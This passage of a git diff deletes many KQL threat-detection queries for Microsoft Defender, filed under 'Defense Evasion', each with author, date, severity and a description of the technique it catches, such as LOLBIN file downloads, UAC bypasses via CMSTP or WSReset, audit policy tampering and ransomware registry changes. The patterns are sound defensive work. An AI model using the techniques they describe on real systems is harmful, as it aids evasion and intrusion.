(FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/Defense Evasion/Add_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_New_Download_Source_To_Winget.kql deleted file mode 100644 index cc0181f1..00000000 --- a/Defense Evasion/Add_New_Download_Source_To_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects usage of winget to add new additional download sources -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql deleted file mode 100644 index 2fc70f43..00000000 --- a/Defense Evasion/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: medium -// Description: Detects usage of winget to add new potentially suspicious download sources -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" \ No newline at end of file diff --git a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql b/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql deleted file mode 100644 index 350c9856..00000000 --- a/Defense Evasion/Add_SafeBoot_Keys_Via_Reg_Utility.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/02 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" \ No newline at end of file diff --git a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql b/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql deleted file mode 100644 index e61ed7f2..00000000 --- a/Defense Evasion/AddinUtil.EXE_Execution_From_Uncommon_Directory.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023/09/18 -// Level: medium -// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/AgentExecutor_PowerShell_Execution.kql deleted file mode 100644 index 01323d08..00000000 --- a/Defense Evasion/AgentExecutor_PowerShell_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards -// Date: 2022/12/24 -// Level: medium -// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe") \ No newline at end of file diff --git a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql b/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql deleted file mode 100644 index 7d763754..00000000 --- a/Defense Evasion/Allow_RDP_Remote_Assistance_Feature.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/19 -// Level: medium -// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp" \ No newline at end of file diff --git a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql b/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql deleted file mode 100644 index 3528b66c..00000000 --- a/Defense Evasion/Amsi.DLL_Loaded_Via_LOLBIN_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/01 -// Level: medium -// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack -// Tags: attack.defense_evasion -DeviceImageLoadEvents -| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql b/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql deleted file mode 100644 index d8a1500d..00000000 --- a/Defense Evasion/Application_Whitelisting_Bypass_via_Dxcap.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/26 -// Level: medium -// Description: Detects execution of of Dxcap.exe -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql b/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql deleted file mode 100644 index caf25951..00000000 --- a/Defense Evasion/Arbitrary_Command_Execution_Using_WSL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/05 -// Level: medium -// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql b/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql deleted file mode 100644 index fb086580..00000000 --- a/Defense Evasion/Arbitrary_DLL_or_Csproj_Code_Execution_Via_Dotnet.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2020/10/18 -// Level: medium -// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql deleted file mode 100644 index 124d7a9b..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: high -// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql deleted file mode 100644 index f28e5897..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: medium -// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql deleted file mode 100644 index 03309431..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "MSOHTMED" to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql deleted file mode 100644 index 6f5fc727..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_MSPUB.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql deleted file mode 100644 index 3f3dd72d..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_PresentationHost.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql deleted file mode 100644 index b4580a08..00000000 --- a/Defense Evasion/Arbitrary_File_Download_Via_Squirrel.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022/06/09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe") \ No newline at end of file diff --git a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql deleted file mode 100644 index 8441648d..00000000 --- a/Defense Evasion/Arbitrary_MSI_Download_Via_Devinit.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/11 -// Level: medium -// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http" \ No newline at end of file diff --git a/Defense Evasion/AspNetCompiler_Execution.kql b/Defense Evasion/AspNetCompiler_Execution.kql deleted file mode 100644 index 52dbd8ef..00000000 --- a/Defense Evasion/AspNetCompiler_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/11/24 -// Level: medium -// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql b/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql deleted file mode 100644 index ec22dd8d..00000000 --- a/Defense Evasion/Assembly_Loading_Via_CL_LoadAssembly.ps1.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/21 -// Level: medium -// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS " \ No newline at end of file diff --git a/Defense Evasion/Atbroker_Registry_Change.kql b/Defense Evasion/Atbroker_Registry_Change.kql deleted file mode 100644 index 465dcede..00000000 --- a/Defense Evasion/Atbroker_Registry_Change.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Mateusz Wydra, oscd.community -// Date: 2020/10/13 -// Level: medium -// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' -// Tags: attack.defense_evasion, attack.t1218, attack.persistence, attack.t1547 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql deleted file mode 100644 index 833d5e8a..00000000 --- a/Defense Evasion/Audit_Policy_Tampering_Via_Auditpol.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Janantha Marasinghe (https://github.com/blueteam0ps) -// Date: 2021/02/02 -// Level: high -// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. -This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. - -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE") \ No newline at end of file diff --git a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql b/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql deleted file mode 100644 index ee26e9fb..00000000 --- a/Defense Evasion/Audit_Policy_Tampering_Via_NT_Resource_Kit_Auditpol.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/18 -// Level: high -// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. -This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. - -// Tags: attack.defense_evasion, attack.t1562.002 -DeviceProcessEvents -| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none" \ No newline at end of file diff --git a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql b/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql deleted file mode 100644 index d58c690b..00000000 --- a/Defense Evasion/Bad_Opsec_Defaults_Sacrificial_Processes_With_Improper_Arguments.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) -// Date: 2020/10/23 -// Level: high -// Description: Detects attackers using tooling with bad opsec defaults. -E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. -One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. - -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))) and (not((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall --channel=stable" and (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql b/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql deleted file mode 100644 index 91362173..00000000 --- a/Defense Evasion/Base64_Encoded_PowerShell_Command_Detected.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/01/29 -// Level: high -// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string -// Tags: attack.t1027, attack.defense_evasion, attack.t1140, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "::FromBase64String(" \ No newline at end of file diff --git a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql deleted file mode 100644 index 75e530fc..00000000 --- a/Defense Evasion/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jimmy Bayne (@bohops) -// Date: 2024/01/02 -// Level: medium -// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll") \ No newline at end of file diff --git a/Defense Evasion/Blackbyte_Ransomware_Registry.kql b/Defense Evasion/Blackbyte_Ransomware_Registry.kql deleted file mode 100644 index c3f67c1d..00000000 --- a/Defense Evasion/Blackbyte_Ransomware_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/24 -// Level: high -// Description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled")) \ No newline at end of file diff --git a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql b/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql deleted file mode 100644 index 76abcf3f..00000000 --- a/Defense Evasion/Bypass_UAC_Using_DelegateExecute.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: high -// Description: Bypasses User Account Control using a fileless method -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\open\\command\\DelegateExecute" \ No newline at end of file diff --git a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql b/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql deleted file mode 100644 index 59a7340a..00000000 --- a/Defense Evasion/Bypass_UAC_Using_SilentCleanup_Task.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nextron Systems -// Date: 2022/01/06 -// Level: high -// Description: Detects the setting of the environement variable "windir" to a non default value. -Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. -The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\Environment\\windir" and (not(RegistryValueData =~ "%SystemRoot%")) \ No newline at end of file diff --git a/Defense Evasion/Bypass_UAC_via_CMSTP.kql b/Defense Evasion/Bypass_UAC_via_CMSTP.kql deleted file mode 100644 index 8ff3d7ea..00000000 --- a/Defense Evasion/Bypass_UAC_via_CMSTP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: high -// Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002, attack.t1218.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "-s" or ProcessCommandLine contains "/au" or ProcessCommandLine contains "-au" or ProcessCommandLine contains "/ni" or ProcessCommandLine contains "-ni") and (FolderPath endswith "\\cmstp.exe" or ProcessVersionInfoOriginalFileName =~ "CMSTP.EXE") \ No newline at end of file diff --git a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql b/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql deleted file mode 100644 index 3524a28c..00000000 --- a/Defense Evasion/Bypass_UAC_via_WSReset.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth -// Date: 2019/10/24 -// Level: high -// Description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wsreset.exe" and (not((FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql b/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql deleted file mode 100644 index 72baadb5..00000000 --- a/Defense Evasion/C#_IL_Code_Compilation_Via_Ilasm.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/07 -// Level: medium -// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe") \ No newline at end of file diff --git a/Defense Evasion/CMSTP_Execution_Process_Creation.kql b/Defense Evasion/CMSTP_Execution_Process_Creation.kql deleted file mode 100644 index 32254f8e..00000000 --- a/Defense Evasion/CMSTP_Execution_Process_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman -// Date: 2018/07/16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/Defense Evasion/CMSTP_Execution_Registry_Event.kql b/Defense Evasion/CMSTP_Execution_Registry_Event.kql deleted file mode 100644 index fc5cd431..00000000 --- a/Defense Evasion/CMSTP_Execution_Registry_Event.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman -// Date: 2018/07/16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey contains "\\cmmgr32.exe" \ No newline at end of file diff --git a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql deleted file mode 100644 index b950101f..00000000 --- a/Defense Evasion/CMSTP_UAC_Bypass_via_COM_Object_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) -// Date: 2019/07/31 -// Level: high -// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql b/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql deleted file mode 100644 index a079b713..00000000 --- a/Defense Evasion/COM_Object_Execution_via_Xwizard.EXE.kql +++ 